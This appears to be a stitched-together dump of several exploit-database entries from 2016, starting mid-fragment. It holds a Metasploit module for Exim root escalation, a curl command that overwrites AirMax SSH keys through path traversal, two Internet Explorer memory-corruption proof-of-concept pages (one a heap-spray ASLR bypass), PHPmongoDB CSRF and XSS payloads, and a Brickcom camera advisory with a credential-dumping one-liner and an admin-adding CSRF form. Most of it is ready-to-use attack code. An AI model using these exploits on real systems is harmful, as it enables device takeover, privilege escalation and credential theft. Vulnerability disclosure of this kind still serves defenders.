The code used to protect against CSRF that is the anti csrf token used is
<?php wp_nonce_field( 'fb_publish', 'fb_publish_wpnonce' ); ?>
But this code is not protecting against the CSRF, the form get submitted
successfully with out any error even though the fb_publish_wpnonce is kept
empty resulting in CSRF vulnerability.
# Author email: cor3sm4sh3r[at]gmail.com
# Contact: https://in.linkedin.com/in/cor3sm4sh3r
# Twitter: https://twitter.com/cor3sm4sh3r
##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule < Msf::Exploit::Local
Rank = ExcellentRanking
def initialize(info = {})
super(update_info(info,
'Name' => 'Exim "perl_startup" Privilege Escalation',
'Description' => %q{
This module exploits a Perl injection vulnerability in Exim < 4.86.2
given the presence of the "perl_startup" configuration parameter.
},
'Author' => [
'Dawid Golunski', # Vulnerability discovery
'wvu' # Metasploit module
],
'References' => [
%w{CVE 2016-1531},
%w{EDB 39549},
%w{URL http://www.exim.org/static/doc/CVE-2016-1531.txt}
],
'DisclosureDate' => 'Mar 10 2016',
'License' => MSF_LICENSE,
'Platform' => 'unix',
'Arch' => ARCH_CMD,
'SessionTypes' => %w{shell meterpreter},
'Privileged' => true,
'Payload' => {
'BadChars' => "\x22\x27", # " and '
'Compat' => {
'PayloadType' => 'cmd cmd_bash',
'RequiredCmd' => 'generic netcat netcat-e bash-tcp telnet'
}
},
'Targets' => [
['Exim < 4.86.2', {}]
],
'DefaultTarget' => 0
))
end
def check
if exploit('whoami') == 'root'
CheckCode::Vulnerable
else
CheckCode::Safe
end
end
def exploit(c = payload.encoded)
# PERL5DB technique from http://perldoc.perl.org/perlrun.html
cmd_exec(%Q{PERL5OPT=-d PERL5DB='exec "#{c}"' exim -ps 2>&-})
end
end
EDB-Note Source: https://hackerone.com/reports/73480
Vulnerability
It's possible to overwrite any file (and create new ones) on AirMax systems, because the "php2" (maybe because of a patch) don't verify the "filename" value of a POST request. It's possible to a unauthenticated user to exploit this vulnerability.
Example
Consider the following request:
POST https://192.168.1.20/login.cgi HTTP/1.1
Cookie: $Version=0; AIROS_SESSIONID=9192de9ba81691e3e4d869a7207ec80f; $Path=/; ui_language=en_US
Content-Type: multipart/form-data; boundary=---------------------------72971515916103336881230390860
Content-Length: 773
User-Agent: Jakarta Commons-HttpClient/3.1
Host: 192.168.1.20
Cookie: $Version=0; AIROS_SESSIONID=7597f7f30cec75e1faef8fb608fc43bb; $Path=/; ui_language=en_US
-----------------------------72971515916103336881230390860
Content-Disposition: form-data; name="keyfile"; filename="../../etc/dropbear/authorized_keys"
Content-Type: application/vnd.ms-publisher
{{Your Public Key HERE}}
-----------------------------72971515916103336881230390860--
The web server must filter the file name ../../etc/dropbear/authorized_keys to just authorized_keys or return a 404. But the AirMax just received the file, overwriting the original (creating if don't exist) in the process. In this case the attacker are uploading arbitrary public ssh keys, but it can be used to upload configurations, or "/etc/passwd"...
Consequences
It's possible to take control over any AirMax Product with simple forged http POST request, what it disastrous.
Reproducing
With a simple command:
curl -F "file=@.ssh/id_rsa.pub;filename=../../etc/dropbear/authorized_keys" -H "Expect:" 'https://192.168.1.20/login.cgi' -k
Of course if the ssh is disabled you can overwrite /etc/passwd and/or /tmp/system.cfg.
<!DOCTYPE html>
<html>
<head>
<meta http-equiv="refresh" content="1"/>
<meta http-equiv="content-type" content="text/html; charset=UTF-8">
<meta http-equiv="Expires" content="0" />
<meta http-equiv="Cache-Control" content="no-store, no-cache, must-revalidate" />
<meta http-equiv="Cache-Control" content="post-check=0, pre-check=0" />
<meta http-equiv="Pragma" content="no-cache" />
<style type="text/css">
body{
background-color:lime;
font-color:white;
};
</style>
<script type='text/javascript'></script>
<script type="text/javascript" language="JavaScript">
/*
* Title: MSHTML!CMarkupPointer::UnEmbed Use After Free
* Author: Marcin Ressel @ressel_m
* Date: 15.04.2016
* Vendor Homepage: www.microsoft.com
* Software Link: n/a
* Version: IE11 (latest)
* Tested on: Windows 10 x64 && Windows 7 x64
* --------------------------------------------------
* IE 11 MSHTML!CMarkupPointer::UnEmbed Use After Free
* IE 11.0.9600.18230 (win7)
* Windows 7 x64, Windows 10 x64 (11.162.10586.0)
* 11.04.2016
*
0:019> g
(490.1194): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
eax=00000000 ebx=0df7bbd0 ecx=126e4f38 edx=00000000 esi=12750fd0 edi=00000000
eip=67028aa8 esp=0a97a658 ebp=0a97a7bc iopl=0 nv up ei pl nz ac po nc
cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00010212
MSHTML!CSpliceTreeEngine::HandleRemovalMutations+0xdb:
67028aa8 8b7610 mov esi,dword ptr [esi+10h] ds:002b:12750fe0=????????
0:007> !heap -p -a esi
address 12750fd0 found in
_DPH_HEAP_ROOT @ ad81000
in free-ed allocation ( DPH_HEAP_BLOCK: VirtAddr VirtSize)
ffe3410: 12750000 2000
747790b2 verifier!AVrfDebugPageHeapFree+0x000000c2
77a5251c ntdll!RtlDebugFreeHeap+0x0000002f
77a0b2a2 ntdll!RtlpFreeHeap+0x0000005d
779b2ce5 ntdll!RtlFreeHeap+0x00000142
74a4adeb vrfcore!VerifierSetAPIClassName+0x0000017b
769d14bd kernel32!HeapFree+0x00000014
67011a67 MSHTML!MemoryProtection::HeapFree+0x00000046
66b08fff MSHTML!CMarkupPointer::UnEmbed+0x000000bd
66d75a96 MSHTML!CMarkupPointer::MoveToGap+0x00000094
67006183 MSHTML!CMarkupPointer::FindTextIdentity+0x000002b7
66d75a22 MSHTML!CDOMTextNode::GetParentNodeHelper+0x0000004b
6719351c MSHTML!CDOMNode::AppendTransientRegisteredObservers+0x00000035
66f192f7 MSHTML!CSpliceTreeEngine::HandleRemovalMutations+0xffef092a
66b47967 MSHTML!CSpliceTreeEngine::RemoveSplice+0x000051ef
66b49c9f MSHTML!CMarkup::SpliceTreeInternal+0x000000a8
66d8dc9b MSHTML!CDoc::CutCopyMove+0x00000d93
66b49a27 MSHTML!RemoveWithBreakOnEmpty+0x00000097
66b3400d MSHTML!CElement::InjectInternal+0x0000043f
66dd76d5 MSHTML!CElement::InjectTextOrHTML+0x00000323
66a857e8 MSHTML!CElement::Var_set_innerText+0x00000050
66a8576c MSHTML!CFastDOM::CHTMLElement::Trampoline_Set_innerText+0x0000003c
7330c572 jscript9!Js::JavascriptExternalFunction::ExternalFunctionThunk+0x00000182
7330d075 jscript9!<lambda_73b9149c3f1de98aaab9368b6ff2ae9d>::operator()+0x0000009d
7330cfb2 jscript9!Js::JavascriptOperators::CallSetter+0x00000076
7333fdcc jscript9!Js::JavascriptOperators::SetProperty_Internal<0>+0x00000341
7333fb83 jscript9!Js::JavascriptOperators::OP_SetProperty+0x00000040
7333fc03 jscript9!Js::JavascriptOperators::PatchPutValueNoFastPath+0x0000004d
73308800 jscript9!Js::InterpreterStackFrame::Process+0x00002c1e
7330bd59 jscript9!Js::InterpreterStackFrame::InterpreterThunk<1>+0x00000200
*/
function testcase()
{
var elements = [];
var eFrame = document.getElementById("e1");
var tmp = eFrame.contentWindow.document.createElement("body");
elements.push(tmp);
tmp = eFrame.contentWindow.document.createElement("cite");
elements.push(tmp);
tmp = eFrame.contentWindow.document.createElement("frame");
elements.push(tmp);
tmp = eFrame.contentWindow.document.createElement("ellipse");
elements.push(tmp);
tmp = eFrame.contentWindow.document.createElement("html");
elements.push(tmp);
tmp = eFrame.contentWindow.document.createElement("command");
elements.push(tmp);
var trg = document;
trg.body.appendChild(elements[0]);
trg.body.appendChild(elements[1]);
trg.body.appendChild(elements[2]);
trg.body.appendChild(elements[3]);
trg.body.appendChild(elements[4]);
trg.body.appendChild(elements[5]);
dom = document.getElementsByTagName("*");
doc = document;
trg = dom[10];
var observer = new MutationObserver(new Function("",""));
observer.observe(trg,{ attributes: true, childList: true, characterData: true, subtree: true});
trg.insertAdjacentHTML("afterBegin","<tbody><ol><script><polygon><circle><table></table><command><table></table><rp>");
trg.innerText = '12345';
}
</script>
<title>IE 11.0.9600.18230 MSHTML!CMarkupPointer::UnEmbed UAF POC</title>
</head>
<body onload='testcase();'>
<iframe id='t1'></iframe><iframe id='e1'></iframe>
<div id='oneUnArg'>||||</div>
</body>
</html>
<!--
CVE-2015-6086
Out Of Bound Read Vulnerability
Address Space Layout Randomization (ASLR) Bypass
Improper handling of new line and white space character caused
Out of Bound Read in CDOMStringDataList::InitFromString. This
flaw can be used to leak the base address of MSHTML.DLL and
effectively bypass Address Space Layout Randomization.
Affected Version:
Internet Explorer 9
Internet Explorer 10
Internet Explorer 11
Test Bed:
IE: 10 & 11
KB: KB3087038
OS: Windows 7 SP1 x86
Advisory:
http://www.payatu.com/advisory-ie_cdomstringdatalist/
https://technet.microsoft.com/library/security/MS15-112
http://www.zerodayinitiative.com/advisories/ZDI-15-547/
Copyright 2016 © Payatu Technologies Pvt. Ltd.
Author: Ashfaq Ansari
Email: ashfaq[at]payatu[dot]com
Websites: www.payatu.com
www.nullcon.net
www.hardwear.io
www.null.co.in
This program is free software: you can redistribute it and/or modify it
under the terms of the GNU General Public License as published by the
Free Software Foundation, either version 3 of the License, or (at your
option) any later version.
This program is distributed in the hope that it will be useful, but WITHOUT
ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS
FOR A PARTICULAR PURPOSE. See the GNU General Public License for more details.
You should have received a copy of the GNU General Public License along with
this program. If not, see <http://www.gnu.org/licenses/>.
THIS SOFTWARE IS PROVIDED ``AS IS'' AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING,
BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A
PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS
BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY
THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE
OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE
POSSIBILITY OF SUCH DAMAGE.
-->
<!DOCTYPE html>
<html>
<head>
<title>IE 10-11 Windows 7 SP1 x86 - OOB Read ALSR Bypass PoC</title>
<meta http-equiv="pragma" content="no-cache"/>
<meta http-equiv="expires" content="0"/>
<script type="text/javascript">
/**
* This function is used to create string of desired size.
*
* @param character
* @param size
* @returns {string}
*/
function createString(character, size) {
while (character.length < size) {
character += character;
}
// BSTR structure
// header | unicode string | NULL terminator
// 4 bytes | sizeof(string) * 2 | 2 bytes
return character.substr(0, (size - 6) / 2);
}
/**
* This function is used to get the Internet Explorer's version.
*
* @link http://stackoverflow.com/questions/19999388/jquery-check-if-user-is-using-ie
* @returns {int | null}
*/
function getInternetExplorerVersion() {
var userAgent = window.navigator.userAgent;
var msie = userAgent.indexOf('MSIE');
if (msie > 0) {
return parseInt(userAgent.substring(msie + 5, userAgent.indexOf('.', msie)), 10);
}
var trident = userAgent.indexOf('Trident/');
if (trident > 0) {
var rv = userAgent.indexOf('rv:');
return parseInt(userAgent.substring(rv + 3, userAgent.indexOf('.', rv)), 10);
}
var edge = userAgent.indexOf('Edge/');
if (edge > 0) {
return parseInt(userAgent.substring(edge + 5, userAgent.indexOf('.', edge)), 10);
}
return null;
}
/**
* This function is used to leak the base address of MSHTML.DLL.
*
* @param offsetOfMSHTMLBaseAddress
*/
function LeakMSHTMLBaseAddress(offsetOfMSHTMLBaseAddress) {
// Step 1: Let's do some clean up
CollectGarbage();
var eventArray = new Array();
var polyLineArray = new Array();
var exploitSuccessful = false;
// Step 2: As the target object is stored in Process Heap
// instead of Isolated Heap, we can use any element that
// is stored on Process Heap to spray the Heap.
//
// To create a predictable pattern on Heap, we spray using
// "MsGestureEvent" and it's size is 0x0A0. We will use
// this object to read the VFTable pointer.
for (var i = 0; i < 0x1000; i++) {
eventArray[i] = document.createEvent('MsGestureEvent');
}
// Step 3: Now we need to create a hole in the allocation
// that we made earlier. The purpose of this hole is to
// allocate the vulnerable buffer just before the Heap
// chunk of "MsGestureEvent"
for (i = 1; i < 0x500; i += 2) {
eventArray[i] = null;
}
// Step 4: As Memory Protector is enabled by default on all
// versions of IE, it will not allow the free of objects
// instantly. So, we need to force free the memory due to
// Delayed Frees.
CollectGarbage2();
// Step 5: Now, fill the hole that we created earlier. The
// "requiredFeatures" property is allocated on OLEAUT32 Cache
// Heap, old Plunger technique does not seems to work for me.
// I have used a neat trick to bypass OLEAUT32 Cache Heap.
for (i = 0; i < 0x250; i++) {
polyLineArray[i] = document.createElementNS('http://www.w3.org/2000/svg', 'polyline');
// Step 6: Trick to bypass allocation on OLEAUT32 Cached Heap
polyLineArray[i].setAttributeNS(null, 'attrib' + i, createString('A', 0x0A0));
// Step 7: Now, "requiredFeatures" property won't be allocated on OLEAUT32 Cache Heap.
polyLineArray[i].setAttributeNS(null, 'requiredFeatures', createString('\n', 0x0A0));
// Step 8: As the whole exploitation depends on certain Heap
// layout, thus, this is unreliable. But to overcome this
// un-reliability, I'm reloading the page until, right Heap
// Layout is achieved.
//
// This PoC is created for the vendor to acknowledge this bug,
// hence reliability is not my concern at this moment. We can
// make it more reliable, but let's leave it for later stage.
//
// Some heuristics to detect if Heap is in the right state.
// Once we have determined the Heap state, we can apply some
// more heuristics.
if (polyLineArray[i].requiredFeatures.numberOfItems == 2 && polyLineArray[i].requiredFeatures.getItem(1).length == 4) {
// Step 9: Read the Out of Bound memory
var OOBReadMemory = escape(polyLineArray[i].requiredFeatures.getItem(1));
// Step 10: Some more heuristics
var spitValue = OOBReadMemory.split('%');
var CDOMMSGestureEvent_VFTablePointer = parseInt('0x' + spitValue[3].replace('u', '') + spitValue[2].replace('u', ''));
var MSHTMLBaseAddress = CDOMMSGestureEvent_VFTablePointer - offsetOfMSHTMLBaseAddress;
// Step 11: Show the message to user
var message = 'MSHTML.DLL Base Address: 0x' + MSHTMLBaseAddress.toString(16);
message += '\n';
message += 'CDOMMSGestureEvent VFTable Pointer: 0x' + CDOMMSGestureEvent_VFTablePointer.toString(16);
alert(message);
// Step 12: Exploit successful
exploitSuccessful = true;
break;
}
}
// Step 13: As stated earlier, this is a bit unreliable.
// If the exploit has failed, reload the current page.
// If reloading does not help, close the browser and
// launch the exploit multiple times.
if (!exploitSuccessful) {
window.location.reload();
}
}
/**
* This function is used fill the wait list of the freed objects
* and trigger Garbage Collection.
*/
function CollectGarbage2() {
// Microsoft implemented Memory Protector to mitigate
// Use after Free vulnerabilities. The object protected
// by Memory Protector won't be freed directly. Instead,
// it will be put into a wait list which will be freed
// when it reaches certain threshold (i.e 100,000 bytes).
var video = new Array();
// Now allocate video element (400 bytes) 250 times
//
// Note: We are not using stack to store the references.
// If we use stack to store the references, the memory
// will never be freed during Mark and Reclaim operation
for (var i = 0; i < 250; i++) {
video[i] = document.createElement('video');
}
// Now free the elements. It will be put into the wait list.
video = null;
// Reclaim the memory by triggering Garbage Collection
CollectGarbage();
}
/**
* This function is used to launch the exploitation by leaking
* the base address of MSHTML.DLL.
*/
function LaunchExploit() {
var browserSupported = false;
var ieVersion = getInternetExplorerVersion();
var offsetOfMSHTMLBaseAddress = null;
if (ieVersion == 11) {
// If you are getting a wrong base address, please update this value
// offsetOfMSHTMLBaseAddress = VFTableAddress - MSHTMLBaseAddress
offsetOfMSHTMLBaseAddress = 0x0002ebe8;
browserSupported = true;
} else if (ieVersion == 10) {
// If you are getting a wrong base address, please update this value
// offsetOfMSHTMLBaseAddress = VFTableAddress - MSHTMLBaseAddress
offsetOfMSHTMLBaseAddress = 0x0000d270;
browserSupported = true;
} else {
alert('Current browser is not supported!\nExploit Tested on IE10 & 11 (Windows 7 SP1 x86)');
}
// Launch the exploit
if (browserSupported) {
LeakMSHTMLBaseAddress(offsetOfMSHTMLBaseAddress);
}
}
</script>
</head>
<body onload='LaunchExploit();'>
</body>
</html>
#################################################################################################################################################
# Exploit Title: PHPmongoDB v1.0.0 - Multiple Vulnerabilities [CSRF |
HTML(or Iframe) Injection | XSS (Reflected & Stored)]
# Date: 14.04.2016
# Exploit Author: Ozer Goker
# Vendor Homepage: http://www.phpmongodb.org
# Software Link: https://github.com/phpmongodb/phpmongodb
# Version: 1.0.0
#################################################################################################################################################
Introduction
A Tool available for administrative work of MongoDB over Web. It is
PHPmongoDB. source = http://www.phpmongodb.org
Vulnerabilities: CSRF | HTML(or Iframe) Injection | XSS (Reflected & Stored)
CSRF details:
#################################################################################################################################################
CSRF1
Create Database
<html>
<body>
<form action="http://localhost/phpmongodb/index.php" method="POST">
<input type="text" name="db" value="db"/>
<input type="text" name="load" value="Database/Save"/>
<input type="submit" value="Create DB"/>
</form>
</body>
</html>
#################################################################################################################################################
CSRF2
Drop Database
<html>
<body>
<form action="http://localhost/phpmongodb/index.php" method="POST">
<input type="text" name="db" value="db"/>
<input type="text" name="load" value="Database/Drop"/>
<input type="submit" value="Drop DB"/>
</form>
</body>
</html>
#################################################################################################################################################
CSRF3
Create Collection
<html>
<body>
<form action="http://localhost/phpmongodb/index.php" method="POST">
<input type="text" name="collection" value="testcollection"/>
<input type="text" name="load" value="Collection/CreateCollection"/>
<input type="text" name="db" value="db"/>
<input type="submit" value="Create Collection"/>
</form>
</body>
</html>
#################################################################################################################################################
Drop Collection
<html>
<body>
<form action="http://localhost/phpmongodb/index.php" method="POST">
<input type="text" name="collection" value="testcollection"/>
<input type="text" name="load" value="Collection/DropCollection"/>
<input type="text" name="db" value="db"/>
<input type="submit" value=Drop Collection"/>
</form>
</body>
</html>
#################################################################################################################################################
Execute Code
<html>
<body>
<form action="http://localhost/phpmongodb/index.php?load=Server/Execute"
method="POST">
<input type="text" name="code" value="db.getCollectionNames()"/>
<input type="text" name="db" value="db"/>
<input type="submit" value=Execute Code"/>
</form>
</body>
</html>
#################################################################################################################################################
Logout
<html>
<body>
<form action="http://localhost/phpmongodb/index.php?load=Login/Logout"
method="POST">
<input type="submit" value="Logout"/>
</form>
</body>
</html>
#################################################################################################################################################
HTML Injection details:
#################################################################################################################################################
HTML Injection1
URL
http://localhost/phpmongodb/index.php/%22%3E%3Ciframe%20src=http://www.phpmongodb.org%3E
METHOD
Get
PARAMETER
URL
PAYLOAD
/"><iframe src=http://www.phpmongodb.org>
#################################################################################################################################################
HTML Injection2
URL
http://localhost/phpmongodb/index.php?size=&load=Collection%2fCreateCollection&max=&capped=on&collection=system.indexes%253E%253Ciframe%2520src%253Dhttp%253A%252f%252fwww.phpmongodb.org%253E&db=local
METHOD
Get
PARAMETER
collection
PAYLOAD
%253E%253Ciframe%2520src%253Dhttp%253A%252f%252fwww.phpmongodb.org%253E
#################################################################################################################################################
HTML Injection3
URL
http://localhost/phpmongodb/index.php?size=&load=Collection%2fCreateCollection&max=&capped=on&collection=system.indexes&db=local%253E%253Ciframe%2520src%253Dhttp%253A%252f%252fwww.phpmongodb.org%253E
METHOD
Get
PARAMETER
db
PAYLOAD
%253E%253Ciframe%2520src%253Dhttp%253A%252f%252fwww.phpmongodb.org%253E
#################################################################################################################################################
HTML Injection4 (Stored)
URL
http://localhost/phpmongodb/index.php
METHOD
Post
PARAMETER
collection
PAYLOAD
%253E%253Ciframe%2520src%253Dhttp%253A%252f%252fwww.phpmongodb.org%253E
Request
POST /phpmongodb/index.php HTTP/1.1
collection=testcollection%253E%253Ciframe%2520src%253Dhttp%253A%252f%
252fwww.phpmongodb.org
%253E&size=&max=&load=Collection%2FCreateCollection&db=db&save=
#################################################################################################################################################
XSS details:
#################################################################################################################################################
XSS1 (Reflected)
URL
http://localhost/phpmongodb/index.php/%22%3E%3Cscript%3Ealert%281%29%3C/script%3E
METHOD
Get
PARAMETER
URL
PAYLOAD
/"><script>alert(1)</script>
#################################################################################################################################################
XSS2 (Reflected)
URL
http://localhost/phpmongodb/index.php?size=&load=Collection%2fCreateCollection&max=&capped=on&collection=system.indexes%253cscript%253ealert%25282%2529%253c%252fscript%253e&db=local
METHOD
Get
PARAMETER
collection
PAYLOAD
%253cscript%253ealert%25282%2529%253c%252fscript%253e
#################################################################################################################################################
XSS3 (Reflected)
URL
http://localhost/phpmongodb/index.php?size=&load=Collection%2fCreateCollection&max=&capped=on&collection=system.indexes&db=local%253cscript%253ealert%25283%2529%253c%252fscript%253e
METHOD
Get
PARAMETER
db
PAYLOAD
%253cscript%253ealert%25283%2529%253c%252fscript%253e
#################################################################################################################################################
XSS4 (stored)
URL
http://localhost/phpmongodb/index.php
METHOD
Post
PARAMETER
collection
PAYLOAD
%253Cscript%253Ealert%25284%2529%253C%252fscript%253E
Request
POST /phpmongodb/index.php HTTP/1.1
collection=testcollection%253Cscript%253Ealert%25284%2529%253C%252fscript%253E&size=&max&load=Collection%2FCreateCollection&db=db&save=
#################################################################################################################################################
XSS5 (Stored)
http://localhost/phpmongodb/index.php?load=Server/Execute
METHOD
Post
PATAMETER
db
PAYLOAD
%253Cscript%253Ealert%25285%2529%253C%252fscript%253E
Request
POST /phpmongodb/index.php?load=Server/Execute HTTP/1.1
code=db.getCollectionNames%28%29&db=db%253Cscript%253Ealert%25285%2529%253C%252fscript%253E
#################################################################################################################################################
_ _ _ _
| | | | | |
___ _ ____ _____| | | | __ _| |__ ___
/ _ \| '__\ \ /\ / / _ \ | | |/ _` | '_ \/ __|
| (_) | | \ V V / __/ | | | (_| | |_) \__ \
\___/|_| \_/\_/ \___|_|_|_|\__,_|_.__/|___/
Security Adivisory
2016-04-12
www.orwelllabs.com
twt:@orwelllabs
sm1thw@0rw3lll4bs:~/bb# ./Bruce.S
[+] surveillance is the business model
of the internet - OK!
sm1thw@0rw3lll4bs:~/bb# echo $?
6079
Adivisory Information
=====================
Vendor: Brickcom Corporation
CVE-Number:N/A
Adivisory-URL:
http://www.orwelllabs.com/2016/04/Brickcom-Multiple-Vulnerabilities.html
OLSA-ID: OLSA-2015-12-12
Impact: High (especially because some of these products are used in
critical environments.)
Remote: Yes
p4n0pt1c0n
I. Insecure Direct Object Reference/Authentication Bypass
II. Sensitive information in plaintext
III. Hard-coded Credentials
IV. Cross-site scripting
V. Basic Authentication
VI. Cross-site Request Forgery
Background
----------
Brickcom (calls itself) as a "leading network video manufacturer in the IP
surveillance industry.
Dedicated to providing the best IP surveillance solutions with a solid
foundation for engineering
quality network video equipment with a Research and Development Department
that has been producing
wireless broadband networking equipment for over twenty years."
These products are used as video surveillance system by costumers and
important sectors such as the Thai 4ir F0rce, as can be seen on the
Vendor's web site.
* notes:
- some firmwares affected (item 'affected products' are very recent, having
been launched
a few months ago, and still vulnerable ... so this is an structural/legacy
problem.
- sensitive information presented in this advisory are fake.
I. Insecure Direct Object Reference/Authentication Bypass
---------------------------------------------------------
(+) affected scripts
- configfile.dump
- syslog.dump
Path: Maintenance -> Configuration -> 'Export'
+ configfile.dump
An unauthenticated GET request to the script "configfile.dump", as follows:
http://xxx.xxx.xxx.xxx/configfile.dump?action=get
or like this
http://xxx.xxx.xxx.xxx/configfile.dump.backup
http://xxx.xxx.xxx.xxx/configfile.dump.gz
or just
http://xxx.xxx.xxx.xxx/configfile.dump
returns all camera settings
[..code_snip..]
DeviceBasicInfo.firmwareVersion=v3.0.6.12
DeviceBasicInfo.macAddress=00:00:00:00:00:00
DeviceBasicInfo.sensorID=OV9X11
DeviceBasicInfo.internalName=Brickcom
DeviceBasicInfo.productName=Di-1092AX
DeviceBasicInfo.displayName=CB-1092AX
DeviceBasicInfo.modelNumber=XXX
DeviceBasicInfo.companyName=Brickcom Corporation
DeviceBasicInfo.comments=[CUBE HD IPCam STREEDM]
DeviceBasicInfo.companyUrl=www.brickcom.com
DeviceBasicInfo.serialNumber=AXNB02B211111
DeviceBasicInfo.skuType=LIT
DeviceBasicInfo.ledIndicatorMode=1
DeviceBasicInfo.minorFW=1
DeviceBasicInfo.hardwareVersion=
DeviceBasicInfo.PseudoPDseProdNum=P3301
AudioDeviceSetting.muted=0
[..code_snip..]
and all credentials including the administrator account, like this:
UserSetSetting.userList.size=2
UserSetSetting.userList.users0.index=0
UserSetSetting.userList.users0.password=MyM4st3rP4ss <<<--- admin pass
UserSetSetting.userList.users0.privilege=1
UserSetSetting.userList.users0.username=Cam_User <<<--- admin user
UserSetSetting.userList.users1.index=0
UserSetSetting.userList.users1.password=C0mm0mP4ss <<<--- (commom) user
pass
UserSetSetting.userList.users1.privilege=1
UserSetSetting.userList.users1.username=User_name <<<--- (commom)
username
UserSetSetting.userList.users2.index=0
UserSetSetting.userList.users2.password=[..code_snip..]
[snip]
BasicNetworkSetting.pppoe.password= <<<--- ppoe user
BasicNetworkSetting.pppoe.username= <<<--- ppoe pass
UPnPSetting.enabled=1
UPnPSetting.name=CB-102Ap-1ffc3
Brickcom.enabled=1
DDNSSetting.dyndnsEnabled=0
DDNSSetting.dyndns.wildcardEnabled=0
DDNSSetting.dyndns.username= <<<--- dyndns user
DDNSSetting.dyndns.password= <<<--- dyndns password
DDNSSetting.dyndns.hostname=
DDNSSetting.tzodnsEnabled=0
DDNSSetting.tzodns.wildcardEnabled=0
DDNSSetting.tzodns.username= <<<--- and here...
DDNSSetting.tzodns.password= <<<--- here....
DDNSSetting.tzodns.hostname=
DDNSSetting.noipdnsEnabled=0
DDNSSetting.noipdns.wildcardEnabled=0
DDNSSetting.noipdns.username= <<<--- here
DDNSSetting.noipdns.password= <<<--- here
DDNSSetting.noipdns.hostname=
and many others...
- Path: System -> System Log -> 'Save to File'
+ syslog.dump
- Request:
(unauthenticated) GET http://xxx.xxx.xxx.xxx/syslog.dump?action=get
- Response:
[..code_snip..]
LOG_NOTICE-WebServer :User '[admin]' logged in to [web server], Sat Mar 1
21:13:36 2014
LOG_NOTICE-WebServer :User '[admin]' logged in to [web server], Sat Mar 1
21:11:02 2014
[..code_snip..]
Proof of Concept
`````````````````
Online Bash exploit-p0c:
curl -s -O http://xxx.xxx.xxx.xxx/configfile.dump && grep "users0"
configfile.dump|awk '{ FS="."; } { print $4; }' || echo -e "[-] The target
seems not be vulnerable, Mr. Robot! \n"
IF target (xxx.xxx.xxx.xxx) is vulnerable the exploit will show a username,
password and privilege level (1:admin), like this:
password=4adm1niS3cr3tP4ss
privilege=1
username=BrickcomADMIN
and a configfile.dump with all credentials, settings, etc. will be recorded
locally.
IF not vulnerable, you'll see the message:
"[-] The target seems not bet vulnerable, Mr. Robot!"
II. sensitive information in plaintext
--------------------------------------
As shown, there are countless cases where credentials and other sensitive
information are store in plaintext.
III. Hard-coded Credentials
---------------------------
All credentials and other sensitive information can be found in html page
user_management_config.html,
Just viewing the html source code:
view-source:http://{xxx.xxx.xxx.xxx}/user_management_config.html
<script type="text/javascript">
var Edit_id="";
var userSet_size="5"
var User_index=new Array(10);
var User_username=new Array(10);
var User_password=new Array(10);
var User_privilege=new Array(10);
User_index[0]="1";
User_username[0]="admin"; <<<----
User_password[0]="admin"; <<<----
User_privilege[0]="1";
User_index[1]="2";
User_username[1]="masteruser"; <<<----
User_password[1]="masterP4sss1*"; <<<----
User_privilege[1]="0";
IV. Cross-site scripting
------------------------
(+) Script: /cgi-bin/NotificationTest.cgi
(+) Param: action=
REQUEST: http://xxx.xxx.xxx.xxx/cgi-bin/NotificationTest.cgi?action=[ **
XSS
**]&addressType=&hostname=h0stn4mE&ipAddress=xxx.xxx.xxxx.xxx&ipv6Address=&portNo=&accountName=brickcom&password=brickcom&ShareDIR=
V. Basic Authentication
-----------------------
The response asks the user to enter credentials for Basic HTTP
authentication.
If these are supplied, they will be submitted over clear-text HTTP (in
Base64-encoded form).
V. Cross-site Request Forgery
-----------------------------
# To add an administrative credential: "brickcom:brickcom"
> Privilege levels:
- visor : 0
- admin : 1
- visor remoto : 2
<html>
<!-- Brickcom FB-100Ae IP Box Camera- CSRF PoC -->
<body>
<form action="http://{xxx.xxx.xxx.xxx}/cgi-bin/users.cgi" method="POST">
<input type="hidden" name="action" value="add" />
<input type="hidden" name="index" value="0" />
<input type="hidden" name="username" value="brickcom" />
<input type="hidden" name="password" value="brickcom" />
<input type="hidden" name="privilege" value="1" />
<input type="submit" value="Submit form" />
</form>
</body>
</html>
# to remove this credential:
<html>
<!-- Brickcom FB-100Ae IP Box Camera- CSRF PoC -->
<body>
<form action="http://{xxx.xxx.xxx.xxx}/cgi-bin/users.cgi" method="POST">
<input type="hidden" name="action" value="delete" />
<input type="hidden" name="username" value="brickcom" />
<input type="submit" value="Submit form" />
</form>
</body>
</html>
affected products
-----------------
(+) various products, including models:
Brickcom FB-100Ae IP Box Camera - Firmware Version: v3.0.6.12
(release:09/08/2010 14:46)
Brickcom WCB-100Ap Wireless Camera - Firmware Version: v3.0.6.26
(release:01/21/2011 18:31)
Vandal Dome Cameras
-------------------
Brickcom VD-202Ne Vandal Dome Camera - Firmware Version: v37019_Promise
(release:2015-10-01_18:46:07)
Brickcom VD-300Np Vandal Dome Camera - Firmware Version: v3.7.0.23T
(release:2016-03-21_10:08:24)
Brickcom VD-E200Nf Vandal Dome Camera - Firmware Version: v3.7.0.5T
(release:2015-06-25_11:18:07)
Bullet Cameras
--------------
Brickcom OB-202Ne Bullet Camera - Firmware Version: v3.7.0.18R
(release:2015-09-08_18:40:11)
Brickcom OB-E200Nf Bullet Camera - Firmware Version: v3.7.0.18.3R
(release:2015-10-16_11:36:46)
Brickcom OB-200Np-LR Bullet Camera - Firmware Version: v3.7.0.18.3R
(release:2015-10-15_11:30:46)
